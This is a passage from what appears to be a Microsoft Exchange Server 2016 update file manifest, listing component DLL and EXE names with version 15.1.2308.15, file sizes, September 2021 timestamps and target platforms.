x86| \nMicrosoft.exchange.management.detailstemplates.dll| 15.1.2308.15| 67,968| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.management.dll| 15.1.2308.15| #########| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.1.2308.15| 58,752| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.1.2308.15| 23,928| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.management.jitprovisioning.dll| 15.1.2308.15| 101,752| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.management.migration.dll| 15.1.2308.15| 543,632| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.management.mobility.dll| 15.1.2308.15| 304,528| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.management.nativeresources.dll| 15.1.2308.15| 131,960| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.management.powershell.support.dll| 15.1.2308.15| 418,680| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.management.provisioning.dll| 15.1.2308.15| 275,832| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.1.2308.15| 70,536| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.management.rbacdefinition.dll| 15.1.2308.15| 7,874,448| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.management.recipient.dll| 15.1.2308.15| 1,500,560| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.management.reportingwebservice.dll| 15.1.2308.15| 145,288| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.management.reportingwebservice.eventlog.dll| 15.1.2308.15| 13,704| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.management.snapin.esm.dll| 15.1.2308.15| 71,560| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.management.systemmanager.dll| 15.1.2308.15| 1,301,392| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.management.transport.dll| 15.1.2308.15| 1,876,352| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.managementgui.dll| 15.1.2308.15| 5,225,872| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.managementmsg.dll| 15.1.2308.15| 36,240| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.mapihttpclient.dll| 15.1.2308.15| 117,624| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.mapihttphandler.dll| 15.1.2308.15| 209,800| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.messagesecurity.dll| 15.1.2308.15| 79,744| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.1.2308.15| 17,288| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.1.2308.15| 156,024| 25-Sep-21| 7:04| x86| \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.1.2308.15| 65,928| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.1.2308.15| 30,584| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.1.2308.15| 58,248| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.1.2308.15| 29,576| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.1.2308.15| 175,480| 25-Sep-21| 7:04| x86| \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.1.2308.15| 28,552| 25-Sep-21| 7:04| x86| \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.1.2308.15| 75,128| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.1.2308.15| 207,248| 25-Sep-21| 7:05| x86| \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.1.2308.15| 440,720| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.1.2308.15| 83,320| 25-Sep-21| 7:05| x86| \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.1.2308.15| 35,192| 25-Sep-21| 7:04| x86| \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.1.2308.15| 53,128| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.1.2308.15| 96,648| 25-Sep-21| 7:04| x86| \nMicrosoft.exchange.migration.dll| 15.1.2308.15| 1,110,416| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.1.2308.15| 14,720| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.mobiledriver.dll| 15.1.2308.15| 135,544| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.1.2308.15| 5,156,728| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.1.2308.15| 19,848| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.1.2308.15| 68,488| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.net.dll| 15.1.2308.15| 5,084,552| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.net.rightsmanagement.dll| 15.1.2308.15| 265,600| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.networksettings.dll| 15.1.2308.15| 37,776| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.1.2308.15| 14,224| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.notifications.broker.exe| 15.1.2308.15| 549,760| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.oabauthmodule.dll| 15.1.2308.15| 22,904| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.oabrequesthandler.dll| 15.1.2308.15| 106,384| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.oauth.core.dll| 15.1.2308.15| 291,728| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.objectstoreclient.dll| 15.1.2308.15| 17,280| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.odata.configuration.dll| 15.1.2308.15| 277,904| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.odata.dll| 15.1.2308.15| 2,992,528| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.officegraph.common.dll| 15.1.2308.15| 89,488| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.officegraph.grain.dll| 15.1.2308.15| 101,752| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.officegraph.graincow.dll| 15.1.2308.15| 38,288| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.1.2308.15| 45,456| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.1.2308.15| 58,256| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.1.2308.15| 147,344| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.1.2308.15| 26,512| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.officegraph.graphstore.dll| 15.1.2308.15| 184,200| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.1.2308.15| 26,504| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.1.2308.15| 38,280| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.1.2308.15| 55,696| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.officegraph.security.dll| 15.1.2308.15| 147,320| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.1.2308.15| 191,888| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.1.2308.15| 33,680| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.partitioncache.dll| 15.1.2308.15| 28,024| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.1.2308.15| 32,656| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.1.2308.15| 15,248| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.pop3.eventlog.dll| 15.1.2308.15| 17,272| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.1.2308.15| 17,272| 25-Sep-21| 7:03| Not applicable| \nMicrosoft.exchange.pop3.exe| 15.1.2308.15| 106,896| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.pop3.exe.fe| 15.1.2308.15| 106,896| 25-Sep-21| 7:01| Not applicable| \nMicrosoft.exchange.pop3service.exe| 15.1.2308.15| 24,976| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.pop3service.exe.fe| 15.1.2308.15| 24,976| 25-Sep-21| 7:02| Not applicable| \nMicrosoft.exchange.popconfiguration.dl1| 15.1.2308.15| 42,896| 25-Sep-21| 7:00| Not applicable| \nMicrosoft.exchange.popimap.core.dll| 15.1.2308.15| 264,080| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.popimap.core.dll.fe| 15.1.2308.15| 264,080| 25-Sep-21| 7:03| Not applicable| \nMicrosoft.exchange.powersharp.dll| 15.1.2308.15| 358,288| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.powersharp.management.dll| 15.1.2308.15| 4,168,584| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.powershell.configuration.dll| 15.1.2308.15| 326,032| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.1.2308.15| 41,336| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.protectedservicehost.exe| 15.1.2308.15| 30,592| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.1.2308.15| 135,032| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.protocols.mapi.dll| 15.1.2308.15| 436,624| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.provisioning.eventlog.dll| 15.1.2308.15| 14,200| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.provisioningagent.dll| 15.1.2308.15| 224,144| 25-Sep-21| 7:04| x86| \nMicrosoft.exchange.provisioningservicelet.dll| 15.1.2308.15| 105,872| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.pst.dll| 15.1.2308.15| 168,848| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.pst.dll.deploy| 15.1.2308.15| 168,848| 25-Sep-21| 7:00| Not applicable| \nMicrosoft.exchange.pswsclient.dll| 15.1.2308.15| 259,464| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.publicfolders.dll| 15.1.2308.15| 72,080| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.1.2308.15| 215,952| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.pushnotifications.dll| 15.1.2308.15| 106,888| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.1.2308.15| 425,848| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.pushnotifications.server.dll| 15.1.2308.15| 70,544| 25-Sep-21| 7:04| x86| \nMicrosoft.exchange.query.analysis.dll| 15.1.2308.15| 46,456| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.query.configuration.dll| 15.1.2308.15| 206,736| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.query.core.dll| 15.1.2308.15| 163,216| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.query.ranking.dll| 15.1.2308.15| 342,416| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.query.retrieval.dll| 15.1.2308.15| 149,392| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.query.suggestions.dll| 15.1.2308.15| 95,120| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.1.2308.15| 127,352| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.relevance.core.dll| 15.1.2308.15| 63,376| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.relevance.data.dll| 15.1.2308.15| 36,752| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.relevance.mailtagger.dll| 15.1.2308.15| 17,808| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.relevance.people.dll| 15.1.2308.15| 9,666,952| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.relevance.peopleindex.dll| 15.1.2308.15| #########| 25-Sep-21| 7:00| x64| \nMicrosoft.exchange.relevance.peopleranker.dll| 15.1.2308.15| 36,744| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.relevance.perm.dll| 15.1.2308.15| 97,664| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.relevance.sassuggest.dll| 15.1.2308.15| 28,560| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.relevance.upm.dll| 15.1.2308.15| 72,072| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.routing.client.dll| 15.1.2308.15| 15,752| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.routing.eventlog.dll| 15.1.2308.15| 13,200| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.routing.server.exe| 15.1.2308.15| 59,256| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.rpc.dll| 15.1.2308.15| 1,681,808| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.rpcclientaccess.dll| 15.1.2308.15| 209,784| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.1.2308.15| 60,304| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.1.2308.15| 517,496| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.1.2308.15| 161,160| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.1.2308.15| 721,784| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.1.2308.15| 243,080| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.1.2308.15| 20,856| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.1.2308.15| 35,200| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.rpchttpmodules.dll| 15.1.2308.15| 42,384| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.1.2308.15| 56,208| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.1.2308.15| 27,528| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.rules.common.dll| 15.1.2308.15| 130,440| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.1.2308.15| 14,720| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.1.2308.15| 20,368| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.safehtml.dll| 15.1.2308.15| 21,392| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.sandbox.activities.dll| 15.1.2308.15| 267,640| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.sandbox.contacts.dll| 15.1.2308.15| 110,976| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.sandbox.core.dll| 15.1.2308.15| 112,528| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.sandbox.services.dll| 15.1.2308.15| 622,480| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.search.bigfunnel.dll| 15.1.2308.15| 162,184| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.1.2308.15| 12,152| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.search.blingwrapper.dll| 15.1.2308.15| 19,336| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.search.core.dll| 15.1.2308.15| 209,808| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.1.2308.15| 17,792| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.search.engine.dll| 15.1.2308.15| 96,656| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.search.fast.configuration.dll| 15.1.2308.15| 16,760| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.search.fast.dll| 15.1.2308.15| 435,088| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.search.files.dll| 15.1.2308.15| 274,296| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.search.flighting.dll| 15.1.2308.15| 24,952| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.search.mdb.dll| 15.1.2308.15| 219,016| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.search.service.exe| 15.1.2308.15| 26,512| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.security.applicationencryption.dll| 15.1.2308.15| 162,192| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.security.dll| 15.1.2308.15| 1,555,856| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.security.msarpsservice.exe| 15.1.2308.15| 19,856| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.security.securitymsg.dll| 15.1.2308.15| 28,560| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.server.storage.admininterface.dll| 15.1.2308.15| 222,608| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.server.storage.common.dll| 15.1.2308.15| 1,110,912| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.1.2308.15| 212,360| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.1.2308.15| 113,544| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.1.2308.15| 82,832| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.server.storage.eventlog.dll| 15.1.2308.15| 80,776| 25-Sep-21| 7:00| x64| \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.1.2308.15| 66,448| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.server.storage.ha.dll| 15.1.2308.15| 81,288| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.1.2308.15| 207,760| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.1.2308.15| 1,163,152| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.1.2308.15| 504,200| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.1.2308.15| 47,504| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.1.2308.15| 848,272| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.1.2308.15| 1,219,976| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.server.storage.propertytag.dll| 15.1.2308.15| 30,608| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.1.2308.15| 120,720| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.1.2308.15| 1,009,552| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.1.2308.15| 110,992| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.server.storage.workermanager.dll| 15.1.2308.15| 34,704| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.server.storage.xpress.dll| 15.1.2308.15| 19,336| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.servicehost.eventlog.dll| 15.1.2308.15| 14,712| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.servicehost.exe| 15.1.2308.15| 60,800| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.1.2308.15| 50,576| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.1.2308.15| 14,216| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.1.2308.15| 14,216| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.services.common.dll| 15.1.2308.15| 74,104| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.services.dll| 15.1.2308.15| 8,477,048| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.services.eventlogs.dll| 15.1.2308.15| 30,072| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.services.ewshandler.dll| 15.1.2308.15| 633,728| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.services.ewsserialization.dll| 15.1.2308.15| 1,651,064| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.services.json.dll| 15.1.2308.15| 296,312| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.services.messaging.dll| 15.1.2308.15| 43,400| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.services.onlinemeetings.dll| 15.1.2308.15| 233,336| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.services.surface.dll| 15.1.2308.15| 178,560| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.services.wcf.dll| 15.1.2308.15| 348,536| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.1.2308.15| 56,712| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.1.2308.15| 94,608| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.setup.common.dll| 15.1.2308.15| 297,360| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.setup.commonbase.dll| 15.1.2308.15| 35,704| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.setup.console.dll| 15.1.2308.15| 27,024| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.setup.gui.dll| 15.1.2308.15| 115,088| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.setup.parser.dll| 15.1.2308.15| 54,160| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.1.2308.15| 75,136| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.sharedcache.caches.dll| 15.1.2308.15| 142,728| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.sharedcache.client.dll| 15.1.2308.15| 24,968| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.1.2308.15| 15,240| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.sharedcache.exe| 15.1.2308.15| 58,768| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.sharepointsignalstore.dll| 15.1.2308.15| 27,016| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.slabmanifest.dll| 15.1.2308.15| 46,992| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.sqm.dll| 15.1.2308.15| 46,984| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.store.service.exe| 15.1.2308.15| 28,040| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.store.worker.exe| 15.1.2308.15| 26,504| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.1.2308.15| 13,704| 25-Sep-21| 7:05| x64| \nMicrosoft.exchange.storeobjectsservice.exe| 15.1.2308.15| 31,624| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.storeprovider.dll| 15.1.2308.15| 1,166,712| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.structuredquery.dll| 15.1.2308.15| 158,608| 25-Sep-21| 7:02| x64| \nMicrosoft.exchange.symphonyhandler.dll| 15.1.2308.15| 628,088| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.1.2308.15| 16,248| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.systemprobemsg.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.textprocessing.dll| 15.1.2308.15| 221,584| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.1.2308.15| 13,712| 25-Sep-21| 7:00| x64| \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.1.2308.15| 29,072| 25-Sep-21| 7:05| x86| \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.1.2308.15| 138,616| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.1.2308.15| 21,904| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.1.2308.15| 40,312| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.1.2308.15| 22,920| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.1.2308.15| 21,368| 25-Sep-21| 7:04| x86| \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.1.2308.15| 212,872| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.1.2308.15| 98,680| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.1.2308.15| 22,920| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.transport.agent.malware.dll| 15.1.2308.15| 169,352| 25-Sep-21| 7:05| x86| \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.1.2308.15| 18,312| 25-Sep-21| 7:05| x64| \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.1.2308.15| 20,872| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.1.2308.15| 31,632| 25-Sep-21| 7:05| x86| \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.1.2308.15| 46,968| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.agent.search.dll| 15.1.2308.15| 30,072| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.1.2308.15| 53,112| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.1.2308.15| 44,936| 25-Sep-21| 7:06| x86| \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.1.2308.15| 18,304| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.1.2308.15| 46,480| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.1.2308.15| 46,480| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.1.2308.15| 28,048| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.transport.common.dll| 15.1.2308.15| 457,096| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.contracts.dll| 15.1.2308.15| 18,320| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.transport.decisionengine.dll| 15.1.2308.15| 30,608| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.dll| 15.1.2308.15| 4,184,456| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.transport.dsapiclient.dll| 15.1.2308.15| 182,160| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.eventlog.dll| 15.1.2308.15| 121,736| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.transport.extensibility.dll| 15.1.2308.15| 403,320| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.1.2308.15| 14,712| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.transport.flighting.dll| 15.1.2308.15| 86,928| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.logging.dll| 15.1.2308.15| 88,952| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.logging.search.dll| 15.1.2308.15| 68,496| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.loggingcommon.dll| 15.1.2308.15| 63,368| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.transport.monitoring.dll| 15.1.2308.15| 430,456| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.net.dll| 15.1.2308.15| 122,232| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.1.2308.15| 17,808| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.protocols.dll| 15.1.2308.15| 29,048| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.1.2308.15| 60,808| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.requestbroker.dll| 15.1.2308.15| 50,056| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.1.2308.15| 33,144| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.scheduler.dll| 15.1.2308.15| 113,016| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.smtpshared.dll| 15.1.2308.15| 18,320| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.storage.contracts.dll| 15.1.2308.15| 52,112| 25-Sep-21| 7:02| 